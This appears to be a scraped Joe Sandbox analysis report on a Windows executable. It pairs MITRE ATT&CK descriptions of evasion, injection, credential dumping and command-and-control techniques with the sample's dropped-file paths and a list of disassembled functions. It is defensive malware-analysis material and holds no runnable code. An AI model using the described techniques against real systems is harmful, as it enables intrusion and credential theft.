Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\1g8B3TB8nn75

C:\Users\user\AppData\LocalLow\9p1l6K91w23M

C:\Users\user\AppData\LocalLow\U28DVK1LkhXI

C:\Users\user\AppData\LocalLow\freebl3.dll

C:\Users\user\AppData\LocalLow\mozglue.dll

C:\Users\user\AppData\LocalLow\msvcp140.dll

C:\Users\user\AppData\LocalLow\nss3.dll

C:\Users\user\AppData\LocalLow\r93FRLGa73HG

C:\Users\user\AppData\LocalLow\softokn3.dll

C:\Users\user\AppData\LocalLow\sqlite3.dll

C:\Users\user\AppData\LocalLow\t56OlInDWvo9

C:\Users\user\AppData\LocalLow\vcruntime140.dll

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Windows Analysis Report
c35d4e641adf21bead54611499c416c8e2de75ac96098.exe

Function 013D8C41 Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 467
threadinjectionmemoryCOMMON

Function 013B599A Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Function 013B2412 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Function 013BA2CC Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Function 013B685D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Function 013BEAA4 Relevance: 7.7, APIs: 5, Instructions: 199
COMMON

Function 013B9664 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126
COMMON

Function 013B99F3 Relevance: 3.2, APIs: 2, Instructions: 166
COMMON

Function 013B97E4 Relevance: 3.1, APIs: 2, Instructions: 99
COMMON

Function 013B6BAD Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Function 013B5500 Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Function 013B6924 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Function 013BA2FD Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Function 013B675E Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Function 013BFEC3 Relevance: 1.5, APIs: 1, Instructions: 36
COMMON

Function 013BCC58 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1427
COMMONCrypto

Function 013B22B0 Relevance: 6.1, APIs: 4, Instructions: 73
COMMONLIBRARYCODE

Function 013B4DC9 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Function 013BC7C0 Relevance: 3.4, APIs: 2, Instructions: 450
COMMONCrypto

Function 013C15B2 Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Function 013B8E50 Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Function 013B4364 Relevance: 1.5, Strings: 1, Instructions: 216
COMMONCrypto

Function 013BAD73 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Function 013BFDCC Relevance: .1, Instructions: 104
COMMONCrypto

Function 013BFCAC Relevance: .1, Instructions: 81
COMMONCrypto